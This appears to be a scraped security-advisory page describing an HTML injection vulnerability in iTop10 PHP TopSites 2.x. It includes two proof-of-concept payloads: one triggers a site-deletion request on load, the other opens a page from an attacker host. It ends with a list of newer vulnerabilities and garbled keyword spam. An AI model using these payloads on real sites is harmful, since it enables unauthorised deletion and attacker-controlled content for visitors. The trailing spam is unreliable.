exploits , vulnerabilities , articles , PHP TopSites HTML Injection Vulnerability

Title	PHP TopSites HTML Injection Vulnerability
Published	2003-01-15-12:00AM
Updated	2003-01-22-07:50PM
Class	Input Validation Error
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	The discovery of this vulnerability has been credited to the Cyberarmy Application and Code Auditing Team.
Vulnerable	iTop10 PHP TopSites Pro 2.2 iTop10 PHP TopSites Free 2.0 b
Not Vulnerable
Code	The following proof of concepts have been made available: <body onLoad= "parent.location='http://www.somewebsite.com/TopSitesdirectory/seditor.php? sid=siteidnumber&a=delete'"> <body onLoad="window.open('http://attackerswebsite/launcher.htm')">
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-18 ReVou Comment Field HTML Injection Vulnerability
2009-12-18 Adobe Flash Media Server Resource Exhaustion Remote Denial of Service Vulnerability
2009-12-18 Centreon Authentication Mechanism Security Bypass Vulnerability
2009-12-18 Family Connections Multiple Input Validation Vulnerabilities
2009-12-18 Drupal Contact and Menu Modules Multiple HTML Injection Vulnerabilities
2009-12-18 Mozilla Firefox and SeaMonkey NTLM Credential Reflection Authentication Bypass Vulnerability
2009-12-18 Mozilla Firefox CVE-2009-3982 JavaScript Engine Multiple Remote Memory Corruption Vulnerabilities
2009-12-17 Zen Cart Insecure File and Programs Information Disclosure and Database Deletion Vulnerability
2009-12-17 Winamp Module Decoder Plugin Multiple Buffer Overflow Vulnerabilities
2009-12-17 Winamp JPEG and PNG Multiple Integer Overflow Vulnerabilities

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 01:06:39 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.stardo news for c Apache 1.3 Sexcy ram horde 3 news for C Toenda collegegir minisql www.india www.trish rondo kemp mud girl forbiddenp xxxvido wh0 news for c IceWarp We Street+fig www.Virtua com_flyspr One.lt Apache htt news for c Apache htt videos of Cartoonfre www.katrin message lo Apache htt Apache htt sexmovie.c www.sixmov Anaksekola www.katrin Videos Apache Tom backdoor xxxvidao Gce nov/de spambot 200 /compo www.2sns.n local 2.6. http://www WWW.Sex m0 http://bey www.tb-114 global ann www.102030